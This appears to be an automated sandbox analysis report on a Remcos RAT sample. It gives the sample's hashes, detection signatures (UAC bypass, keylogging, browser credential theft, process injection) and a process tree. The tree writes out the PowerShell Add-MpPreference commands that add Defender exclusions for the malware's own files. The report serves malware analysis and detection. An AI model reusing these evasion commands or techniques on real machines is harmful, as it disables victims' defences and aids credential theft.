
Windows Analysis Report
4XYAW8PbZH.exe

Overview

General Information

Sample name: 4XYAW8PbZH.exe (renamed because the original name is a hash value)
Original sample name: 4A9440BAA61BE8363A372B0BBC5933AD.exe
Analysis ID: 1584203
MD5: 4a9440baa61be8363a372b0bbc5933ad
SHA1: 9aa5380dc87829c6fa22e9029cadcab9f6221ef9
SHA256: 51c0bcbc40451c10e3b56df10853156378e8dbfb32ee63ea936737d42818822c
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample file name is different from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 4XYAW8PbZH.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\4XYAW8PbZH.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
    • powershell.exe (PID: 2536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 4XYAW8PbZH.exe (PID: 2816 cmdline: "C:\Users\user\Desktop\4XYAW8PbZH.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
      • graias.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
        • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7576 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • graias.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
          • svchost.exe (PID: 7412 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8600 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 9032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8216 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7144 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 5220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 4548 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1908,i,16046133886444858587,11187754230774806872,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9172 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7816 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8808 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12758286000912440692,11284502875771047049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8220 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 1716 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8256 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 2160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 1352 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 5628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7572 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9880 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 10092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 4420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7108 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
